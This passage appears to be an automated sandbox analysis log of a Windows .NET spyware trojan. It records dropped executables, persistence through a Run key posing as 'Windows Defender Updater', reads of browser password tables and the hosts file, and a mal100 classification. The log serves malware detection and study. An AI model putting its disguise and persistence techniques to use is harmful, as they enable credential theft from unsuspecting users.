                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3A3AA20_2_00007FFBAD3A3AA2
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD39A2830_2_00007FFBAD39A283
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 10_2_00007FFBAD3A2D2610_2_00007FFBAD3A2D26
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 10_2_00007FFBAD3A3AD210_2_00007FFBAD3A3AD2
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 10_2_00007FFBAD39337010_2_00007FFBAD393370
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3B2CF611_2_00007FFBAD3B2CF6
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A351011_2_00007FFBAD3A3510
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3B3AA211_2_00007FFBAD3B3AA2
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A42AE11_2_00007FFBAD3A42AE
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3AA28311_2_00007FFBAD3AA283
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD372CF612_2_00007FFBAD372CF6
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD36351012_2_00007FFBAD363510
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD373AA212_2_00007FFBAD373AA2
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD3642AE12_2_00007FFBAD3642AE
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD36A28312_2_00007FFBAD36A283
                    Source: 5VXh2VBmA0.exe, 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZip.exe( vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Remoting.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCustomMarshalers.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZip.exe( vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000000.255311659.00000000007E6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameupdate_windows10.exeD vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.524251422.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exeBinary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exeBinary or memory string: OriginalFilenameZip.exe( vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exeBinary or memory string: OriginalFilenameupdate_windows10.exeD vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exeReversingLabs: Detection: 80%
                    Source: 5VXh2VBmA0.exeVirustotal: Detection: 60%
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile read: C:\Users\user\Desktop\5VXh2VBmA0.exeJump to behavior
                    Source: 5VXh2VBmA0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\5VXh2VBmA0.exe C:\Users\user\Desktop\5VXh2VBmA0.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\update_232309.exe "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\update_232309.exe "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile created: C:\Users\user\Desktop\Newtonsoft.Json.dllJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.winEXE@5/11@16/3
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000012FD5000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 5VXh2VBmA0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeMutant created: \Sessions\1\BaseNamedObjects\update_windows10
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 5VXh2VBmA0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 5VXh2VBmA0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 5VXh2VBmA0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Windows.Forms.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9A6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9B9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: rms.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.547892509.000000001E657000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \gom_v_4.0\Zip\Zip\obj\Debug\Zip.pdb source: 5VXh2VBmA0.exe, Zip.exe.0.dr
                    Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 5VXh2VBmA0.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr
                    Source: Binary string: \gom_v_4.0\update_windows10\update_windows10\obj\Debug\update_windows10.pdb source: 5VXh2VBmA0.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD39761E pushad ; retf 0_2_00007FFBAD39764D
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD39764E push eax; retf 0_2_00007FFBAD39765D
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3981DE push eax; ret 0_2_00007FFBAD3981ED
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3981AE pushad ; ret 0_2_00007FFBAD3981DD
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD396199 pushad ; ret 0_2_00007FFBAD3961CD
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 10_2_00007FFBAD39721E pushad ; iretd 10_2_00007FFBAD39724D
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 10_2_00007FFBAD39724E push eax; iretd 10_2_00007FFBAD39725D
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 10_2_00007FFBAD3A7313 push ebx; iretd 10_2_00007FFBAD3A731A
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A81DE push eax; ret 11_2_00007FFBAD3A81ED
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A81AE pushad ; ret 11_2_00007FFBAD3A81DD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A761E pushad ; retf 11_2_00007FFBAD3A764D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A764E push eax; retf 11_2_00007FFBAD3A765D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A4CBA pushad ; iretd 11_2_00007FFBAD3A4CBD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 11_2_00007FFBAD3A6199 pushad ; ret 11_2_00007FFBAD3A61CD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD3681DE push eax; ret 12_2_00007FFBAD3681ED
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD3681AE pushad ; ret 12_2_00007FFBAD3681DD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD36761E pushad ; retf 12_2_00007FFBAD36764D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD36764E push eax; retf 12_2_00007FFBAD36765D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 12_2_00007FFBAD366199 pushad ; ret 12_2_00007FFBAD3661CD
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to dropped file
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile created: C:\Users\user\AppData\Local\Temp\Zip.exeJump to dropped file
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile created: C:\Users\user\Desktop\Newtonsoft.Json.dllJump to dropped file
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender UpdaterJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender UpdaterJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: c:\users\user\desktop\5vxh2vbma0.exeFile moved: C:\Users\user\AppData\Local\Temp\update_232309.exeJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
